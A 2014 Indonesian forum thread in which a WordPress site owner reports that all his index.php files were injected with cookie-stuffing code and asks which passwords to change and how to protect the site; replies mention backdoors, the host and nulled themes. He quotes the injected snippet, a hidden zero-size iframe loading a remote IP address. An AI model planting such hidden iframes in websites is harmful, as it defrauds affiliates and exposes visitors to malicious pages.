1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

[ask] Wordpress terkena inject cookies stuffing, langkah apa yang harus dilakukan?

Discussion in 'Hosting & Domain' started by reccountme, Oct 18, 2014.

1. reccountme

reccountme Ads.id Pro

selamat pagi teman2,
    Pagi2 sudah dikagetkan dengan situs saya yang tidak dapat diakses, dan errornya terpampang pada halaman web :((. error terdapat pada halaman index.php pada situs wordpress. saya coba membuka pada cpanel dan file index.php, ternyata index.php saya terinject dengan cookies stuffing , potongan script injectednya sebagai berikut
    PHP:
    /** Loads the WordPress Environment and Template */require( dirname__FILE__ ) . '/wp-blog-header.php' );<html><body><iframe src="hxxp://217.12.207.44/c82f?default_keyword=newftp&referrer=all_frp&source=google.ru" width="0" height="0" align="none"></body></html>
    si hacker berusaha menyusupkan script cookies stuffing pada halaman index.php saya, dan ternyata setiap file index.php saya sudah disusupi,saya mencoba mengakses url 217.12.207.44, dan itu alamat ip google rusia.

yang ingin saya tanyakan,
    1. setelah saya bersihkan file2 html saya, password apa yang harus segera saya rubah ?
    2. Untuk menghindari terjadi hal semacam ini / proteksi apa yang perlu saya lakukan ?
    3. Apakah saya harus lapor pada pihak hosting ? (saya hosting pada mast*rw*b)

terimakasih

makasih gan, sementara mast*rw*b agak lemot, mungkin perbaikan, saya sudah kirim tiket support, terpaksa saya harus scanning satu persatu file saya.

Last edited: Oct 18, 2014
  2. bius230386

bius230386 Ads.id Fan

Re: [ask] Wordpress terkena inject cookies stuffing, langkah apa yang harus dilakukan

pihak hosting gan lapor aja takutnya dia udah nanem backdoor php kena lagi pasti walau udah ganti password juga , klo ama pihak hosting dia cari file baru yg di indentifikasi backdoor jd aman dan ganti password agan

3. andiklive

andiklive Super Hero

Re: [ask] Wordpress terkena inject cookies stuffing, langkah apa yang harus dilakukan

index.php core wordpress atau index.php themes???
    kalau index.php core dari sisi host yang gak secure kalau gak user sendiri yang lalai...
    kalau index.php themes pastikan pake themes yang legal, kalau nulled udah biasa kayaknya kejadian gitu... :D

4. reccountme

reccountme Ads.id Pro

index.php core wordpress yang kena, dan seluruh file dengan nama index.php. kalau theme saya pakai theme bawaan wordpress :) , sudah open ticket katanya yang yang bermasalah script saya yang ga secure , jadi bingung sendiri :-B

Share This Page